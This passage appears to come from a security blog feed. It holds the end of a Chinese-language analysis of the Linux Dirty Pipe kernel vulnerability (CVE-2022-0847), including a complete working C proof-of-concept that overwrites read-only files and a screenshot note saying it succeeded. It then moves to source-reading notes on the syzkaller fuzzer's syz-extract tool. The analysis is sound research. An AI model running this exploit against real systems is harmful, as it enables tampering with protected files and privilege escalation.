class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/user.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> PAGE_SIZE</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Create a pipe where all &quot;bufs&quot; on the pipe_inode_info ring have the</span></span><br><span class="line"><span class="comment"> * PIPE_BUF_FLAG_CAN_MERGE flag set.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">prepare_pipe</span><span class="params">(<span class="type">int</span> p[<span class="number">2</span>])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">pipe</span>(p)) <span class="built_in">abort</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">const</span> <span class="type">unsigned</span> pipe_size = <span class="built_in">fcntl</span>(p[<span class="number">1</span>], F_GETPIPE_SZ);</span><br><span class="line">    <span class="type">static</span> <span class="type">char</span> buffer[<span class="number">4096</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* fill the pipe completely; each pipe_buffer will now have</span></span><br><span class="line"><span class="comment">       the PIPE_BUF_FLAG_CAN_MERGE flag */</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">unsigned</span> r = pipe_size; r &gt; <span class="number">0</span>;) &#123;</span><br><span class="line">        <span class="type">unsigned</span> n = r &gt; <span class="built_in">sizeof</span>(buffer) ? <span class="built_in">sizeof</span>(buffer) : r;</span><br><span class="line">        <span class="built_in">write</span>(p[<span class="number">1</span>], buffer, n);</span><br><span class="line">        r -= n;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* drain the pipe, freeing all pipe_buffer instances (but</span></span><br><span class="line"><span class="comment">       leaving the flags initialized) */</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">unsigned</span> r = pipe_size; r &gt; <span class="number">0</span>;) &#123;</span><br><span class="line">        <span class="type">unsigned</span> n = r &gt; <span class="built_in">sizeof</span>(buffer) ? <span class="built_in">sizeof</span>(buffer) : r;</span><br><span class="line">        <span class="built_in">read</span>(p[<span class="number">0</span>], buffer, n);</span><br><span class="line">        r -= n;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* the pipe is now empty, and if somebody adds a new</span></span><br><span class="line"><span class="comment">       pipe_buffer without initializing its &quot;flags&quot;, the buffer</span></span><br><span class="line"><span class="comment">       will be mergeable */</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (argc != <span class="number">4</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Usage: %s TARGETFILE OFFSET DATA\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* dumb command-line argument parser */</span></span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *<span class="type">const</span> path = argv[<span class="number">1</span>];</span><br><span class="line">    <span class="type">loff_t</span> offset = <span class="built_in">strtoul</span>(argv[<span class="number">2</span>], <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *<span class="type">const</span> data = argv[<span class="number">3</span>];</span><br><span class="line">    <span class="type">const</span> <span class="type">size_t</span> data_size = <span class="built_in">strlen</span>(data);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (offset % PAGE_SIZE == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Sorry, cannot start writing at a page boundary\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">const</span> <span class="type">loff_t</span> next_page = (offset | (PAGE_SIZE - <span class="number">1</span>)) + <span class="number">1</span>;</span><br><span class="line">    <span class="type">const</span> <span class="type">loff_t</span> end_offset = offset + (<span class="type">loff_t</span>)data_size;</span><br><span class="line">    <span class="keyword">if</span> (end_offset &gt; next_page) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Sorry, cannot write across a page boundary\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* open the input file and validate the specified offset */</span></span><br><span class="line">    <span class="type">const</span> <span class="type">int</span> fd = <span class="built_in">open</span>(path, O_RDONLY); <span class="comment">// yes, read-only! :-)</span></span><br><span class="line">    <span class="keyword">if</span> (fd &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;open failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">stat</span> st;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">fstat</span>(fd, &amp;st)) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;stat failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (offset &gt; st.st_size) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Offset is not inside the file\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (end_offset &gt; st.st_size) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Sorry, cannot enlarge the file\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* create the pipe with all flags initialized with</span></span><br><span class="line"><span class="comment">       PIPE_BUF_FLAG_CAN_MERGE */</span></span><br><span class="line">    <span class="type">int</span> p[<span class="number">2</span>];</span><br><span class="line">    <span class="built_in">prepare_pipe</span>(p);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* splice one byte from before the specified offset into the</span></span><br><span class="line"><span class="comment">       pipe; this will add a reference to the page cache, but</span></span><br><span class="line"><span class="comment">       since copy_page_to_iter_pipe() does not initialize the</span></span><br><span class="line"><span class="comment">       &quot;flags&quot;, PIPE_BUF_FLAG_CAN_MERGE is still set */</span></span><br><span class="line">    --offset;</span><br><span class="line">    <span class="type">ssize_t</span> nbytes = <span class="built_in">splice</span>(fd, &amp;offset, p[<span class="number">1</span>], <span class="literal">NULL</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (nbytes &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;splice failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (nbytes == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;short splice\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* the following write will not create a new pipe_buffer, but</span></span><br><span class="line"><span class="comment">       will instead write into the page cache, because of the</span></span><br><span class="line"><span class="comment">       PIPE_BUF_FLAG_CAN_MERGE flag */</span></span><br><span class="line">    nbytes = <span class="built_in">write</span>(p[<span class="number">1</span>], data, data_size);</span><br><span class="line">    <span class="keyword">if</span> (nbytes &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;write failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((<span class="type">size_t</span>)nbytes &lt; data_size) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;short write\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;It worked!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> EXIT_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行结果如下：</p><p><img src="/2022/04/dirty-pipe/image-20220403152547117.png" alt="image-20220403152547117"></p><p>可以看到运行的非常顺利，成功在<strong>只读打开</strong>该文件的情况下，完成对该文件的<strong>写入</strong>。</p><h2 id="七、参考">七、参考</h2><ul><li><a href="https://dirtypipe.cm4all.com/">The Dirty Pipe Vulnerability - cm4all</a></li><li><a href="https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit">CVE-2022-0847-DirtyPipe-Exploit - github</a></li><li>linux github commits<ul><li><a href="https://github.com/torvalds/linux/commit/241699cd72a8489c9446ae3910ddd243e9b9061b">new iov_iter flavour: pipe-backed - linux commit</a></li><li><a href="https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958">pipe: merge anon_pipe_buf*_ops - linux commit</a></li><li><a href="https://github.com/torvalds/linux/commit/9d2231c5d74e13b2a0546fee6737ee4446017903">lib/iov_iter: initialize “flags” in new pipe_buffer - linux commit</a></li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;Dirty Pipe 漏洞是 Linux 系统中的一个内核提权漏洞，漏洞危害堪比 Dirty COW，但相对于 Dirty COW 来说更加容易利用。&lt;/p&gt;
&lt;p&gt;漏洞影响范围：&lt;a href=&quot;f6dd975583bd8ce088400648fd9819e4691c8958&quot;&gt;pipe: merge anon_pipe_buf*_ops - linux commit&lt;/a&gt; （v5.8-rc1） ~ &lt;a href=&quot;https://github.com/torvalds/linux/commit/9d2231c5d74e13b2a0546fee6737ee4446017903&quot;&gt;lib/iov_iter: initialize “flags” in new pipe_buffer&lt;/a&gt;（v5.17-rc6）&lt;/p&gt;
&lt;p&gt;时间范围大概是 2020/5/21 - 2022/2/21。&lt;/p&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>syzkaller 源码阅读笔记-1</title>
    <link href="https://kiprey.github.io/2022/03/syzkaller-1/"/>
    <id>https://kiprey.github.io/2022/03/syzkaller-1/</id>
    <published>2022-03-14T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.097Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p><a href="https://github.com/google/syzkaller">syzkaller</a> 是 google 开源的一款无监督覆盖率引导的 kernel fuzzer，支持包括 Linux、Windows 等操作系统的测试。</p><p>syzkaller 有很多个部件。其中：</p><ul><li>syz-extract：用于解析 syzlang 中的常量</li><li>syz-sysgen：用于解析 syzlang，提取其中描述的 syscall 和参数类型，以及参数依赖关系</li><li>syz-manager：用于启动与管理 syzkaller</li><li>syz-fuzzer：实际在 VM 中运行的 fuzzer</li><li>syz-executor：实际在 VM 中运行的测试程序</li></ul><p>架构图如下：</p><p><img src="/2022/03/syzkaller-1/process_structure.png" alt="syzkaller 的进程结构"></p><p>在本文中，我将先介绍 <strong>syz-extract 和 syz-sysgen</strong> 的源码。</p><span id="more"></span><blockquote><p>在本系列源码阅读笔记中，所有涉及到的 arch 和 platform 均为 <strong>x86_64 linux</strong>，不再另行说明。</p><p>syzkaller git checkout： 3a9d0024ba818c5b37058d9ac6fdfc0ddfa78be6</p><p>checkout Date:   Fri Nov 19 13:06:38 2021 +0100</p></blockquote><h2 id="二、syz-extract">二、syz-extract</h2><p>用途：解析并获取 syzlang 文件中的常量所对应的具体整型，并将结果存放至 xxx.txt.const 文件中。</p><h3 id="1-main">1. main</h3><blockquote><p>syz-extract main 函数位于 <code>sys/syz-extract/extract.go</code> 中。</p></blockquote><p>首先，syz-extract 将会尝试解析传入的参数：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in Function `main` </span></span><br><span class="line">flag.Parse()</span><br><span class="line"><span class="keyword">if</span> *flagBuild &amp;&amp; *flagBuildDir != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    tool.Failf(<span class="string">&quot;-build and -builddir is an invalid combination&quot;</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其参数列表如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> (</span><br><span class="line">    flagOS        = flag.String(<span class="string">&quot;os&quot;</span>, runtime.GOOS, <span class="string">&quot;target OS&quot;</span>)</span><br><span class="line">    flagBuild     = flag.Bool(<span class="string">&quot;build&quot;</span>, <span class="literal">false</span>, <span class="string">&quot;regenerate arch-specific kernel headers&quot;</span>)</span><br><span class="line">    flagSourceDir = flag.String(<span class="string">&quot;sourcedir&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;path to kernel source checkout dir&quot;</span>)</span><br><span class="line">    flagIncludes  = flag.String(<span class="string">&quot;includedirs&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;path to other kernel source include dirs separated by commas&quot;</span>)</span><br><span class="line">    flagBuildDir  = flag.String(<span class="string">&quot;builddir&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;path to kernel build dir&quot;</span>)</span><br><span class="line">    flagArch      = flag.String(<span class="string">&quot;arch&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;comma-separated list of arches to generate (all by default)&quot;</span>)</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>之后是调用 archFileList 函数，解析传入的参数，并生成对应的返回值。</p><blockquote><p>其中</p><ul><li>OS 为操作系统<strong>字符串</strong></li><li>archArray 为待生成的 arch <strong>字符串数组</strong></li><li>files 为待分析的 syzlang 文件名 <strong>字符串数组</strong></li></ul></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in Function `main` </span></span><br><span class="line">OS, archArray, files, err := archFileList(*flagOS, *flagArch, flag.Args())</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Fail(err)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>接下来，便是尝试获取 OS 所对应的 Extractor 结构体；如果 OS 不存在则肯定取不到，直接报错：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in Function `main` </span></span><br><span class="line">extractor := extractors[OS]</span><br><span class="line"><span class="keyword">if</span> extractor == <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Failf(<span class="string">&quot;unknown os: %v&quot;</span>, OS)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>extractors 数组如下所示，该数组为不同的 OS 实例化了不同的 Extractor 类。其中 linux OS 所对应的 Extractor 实例（即那三个函数的实现）位于 <code>sys/syz-extract/linux.go</code> 中：</p><blockquote><p>三个函数的实现我们稍后再看。</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> Extractor <span class="keyword">interface</span> &#123;</span><br><span class="line">    prepare(sourcedir <span class="type">string</span>, build <span class="type">bool</span>, arches []*Arch) <span class="type">error</span></span><br><span class="line">    prepareArch(arch *Arch) <span class="type">error</span></span><br><span class="line">    processFile(arch *Arch, info *compiler.ConstInfo) (<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> extractors = <span class="keyword">map</span>[<span class="type">string</span>]Extractor&#123;</span><br><span class="line">    targets.Akaros:  <span class="built_in">new</span>(akaros),</span><br><span class="line">    targets.Linux:   <span class="built_in">new</span>(linux), <span class="comment">// sys/syz-extract/linux.go</span></span><br><span class="line">    targets.FreeBSD: <span class="built_in">new</span>(freebsd),</span><br><span class="line">    targets.Darwin:  <span class="built_in">new</span>(darwin),</span><br><span class="line">    targets.NetBSD:  <span class="built_in">new</span>(netbsd),</span><br><span class="line">    targets.OpenBSD: <span class="built_in">new</span>(openbsd),</span><br><span class="line">    <span class="string">&quot;android&quot;</span>:       <span class="built_in">new</span>(linux),</span><br><span class="line">    targets.Fuchsia: <span class="built_in">new</span>(fuchsia),</span><br><span class="line">    targets.Windows: <span class="built_in">new</span>(windows),</span><br><span class="line">    targets.Trusty:  <span class="built_in">new</span>(trusty),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>回到 main 函数，syz-extract 要用已有的 <strong>OS 字符串、archArray 字符串数组，以及 syzlang 文件名数组</strong>来生成出对应的 <strong>arches 结构体数组</strong>：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `main`</span></span><br><span class="line">arches, err := createArches(OS, archArray, files)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Fail(err)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> *flagSourceDir == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    tool.Fail(fmt.Errorf(<span class="string">&quot;provide path to kernel checkout via -sourcedir &quot;</span> +</span><br><span class="line">                         <span class="string">&quot;flag (or make extract SOURCEDIR)&quot;</span>))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>准备工作已经做的差不多了，接下来让 extractor 执行初始化操作：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function main</span></span><br><span class="line"><span class="keyword">if</span> err := extractor.prepare(*flagSourceDir, *flagBuild, arches); err != <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Fail(err)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这一步实际上会调用到 <code>sys/syz-extract/linux.go</code> 中的 <code>prepare</code> 函数：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in sys/syz-extract/linux.go</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(*linux)</span></span> prepare(sourcedir <span class="type">string</span>, build <span class="type">bool</span>, arches []*Arch) <span class="type">error</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> build &#123;</span><br><span class="line">        <span class="comment">// Run &#x27;make mrproper&#x27;, otherwise out-of-tree build fails.</span></span><br><span class="line">        <span class="comment">// However, it takes unreasonable amount of time,</span></span><br><span class="line">        <span class="comment">// so first check few files and if they are missing hope for best.</span></span><br><span class="line">        <span class="keyword">for</span> _, a := <span class="keyword">range</span> arches &#123;</span><br><span class="line">            arch := a.target.KernelArch</span><br><span class="line">            <span class="keyword">if</span> osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;.config&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;init/main.o&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;include/config&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;include/generated/compile.h&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;arch&quot;</span>, arch, <span class="string">&quot;include&quot;</span>, <span class="string">&quot;generated&quot;</span>)) &#123;</span><br><span class="line">                fmt.Printf(<span class="string">&quot;make mrproper ARCH=%v\n&quot;</span>, arch)</span><br><span class="line">                out, err := osutil.RunCmd(time.Hour, sourcedir, <span class="string">&quot;make&quot;</span>, <span class="string">&quot;mrproper&quot;</span>, <span class="string">&quot;ARCH=&quot;</span>+arch,</span><br><span class="line">                    <span class="string">&quot;-j&quot;</span>, fmt.Sprint(runtime.NumCPU()))</span><br><span class="line">                <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                    <span class="keyword">return</span> fmt.Errorf(<span class="string">&quot;make mrproper failed: %v\n%s&quot;</span>, err, out)</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(arches) &gt; <span class="number">1</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> fmt.Errorf(<span class="string">&quot;more than 1 arch is invalid without -build&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果不指定<strong>重新生成 linux kernel header</strong>，那么只会做一些简单的检查。但如果指定重新生成了，则会尝试在 linux kernel src 上执行 <code>make mrproper</code>。</p><p>回到 main 函数，接下来便是创建 go routine 通信管道和启动并行 worker：</p><blockquote><p>go routine 是 go 的轻量级线程，其中关键字 <code>go</code> 后面的语句将被放进新的 go routine 中执行。</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">jobC := <span class="built_in">make</span>(<span class="keyword">chan</span> <span class="keyword">interface</span>&#123;&#125;, <span class="built_in">len</span>(archArray)*<span class="built_in">len</span>(files))</span><br><span class="line"><span class="comment">// 将 arch 结构体放置进 jobC 管道中</span></span><br><span class="line"><span class="keyword">for</span> _, arch := <span class="keyword">range</span> arches &#123;</span><br><span class="line">    jobC &lt;- arch</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> p := <span class="number">0</span>; p &lt; runtime.GOMAXPROCS(<span class="number">0</span>); p++ &#123;</span><br><span class="line">    <span class="keyword">go</span> worker(extractor, jobC)</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>worker 启动后，main 函数就需要等待 worker 处理完成后才能保存处理结果至文件中，这就涉及到了线程协同。注意到代码中有 <code>&lt;-arch.done</code> 和 <code>&lt;-f.done</code> 语句，这两个语句会一直阻塞等待管道，直到其传来信息。若 worker 函数中对管道执行 close 操作，则被关闭的管道将不再等待，继续向下执行。因此这里 syz-extract 就利用了管道来完成线程协同。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `main`</span></span><br><span class="line">constFiles := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]*compiler.ConstFile)</span><br><span class="line"><span class="keyword">for</span> _, file := <span class="keyword">range</span> files &#123;</span><br><span class="line">    constFiles[file] = compiler.NewConstFile()</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span> _, arch := <span class="keyword">range</span> arches &#123;</span><br><span class="line">    fmt.Printf(<span class="string">&quot;generating %v/%v...\n&quot;</span>, arch.target.OS, arch.target.Arch)</span><br><span class="line">    &lt;-arch.done</span><br><span class="line">    <span class="keyword">if</span> arch.err != <span class="literal">nil</span> &#123;</span><br><span class="line">        failed = <span class="literal">true</span></span><br><span class="line">        fmt.Printf(<span class="string">&quot;%v\n&quot;</span>, arch.err)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> _, f := <span class="keyword">range</span> arch.files &#123;</span><br><span class="line">        &lt;-f.done</span><br><span class="line">        <span class="keyword">if</span> f.err != <span class="literal">nil</span> &#123;</span><br><span class="line">            failed = <span class="literal">true</span></span><br><span class="line">            fmt.Printf(<span class="string">&quot;%v: %v\n&quot;</span>, f.name, f.err)</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        constFiles[f.name].AddArch(f.arch.target.Arch, f.consts, f.undeclared)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>后面的代码内容便是将生成结果保存进 <code>.const</code> 文件中，没有其他有意思的东西了：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `main`</span></span><br><span class="line"><span class="keyword">for</span> file, cf := <span class="keyword">range</span> constFiles &#123;</span><br><span class="line">    outname := filepath.Join(<span class="string">&quot;sys&quot;</span>, OS, file+<span class="string">&quot;.const&quot;</span>)</span><br><span class="line">    data := cf.Serialize()</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(data) == <span class="number">0</span> &#123;</span><br><span class="line">        os.Remove(outname)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> err := osutil.WriteFile(outname, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        tool.Failf(<span class="string">&quot;failed to write output file: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> !failed &amp;&amp; *flagArch == <span class="string">&quot;&quot;</span> 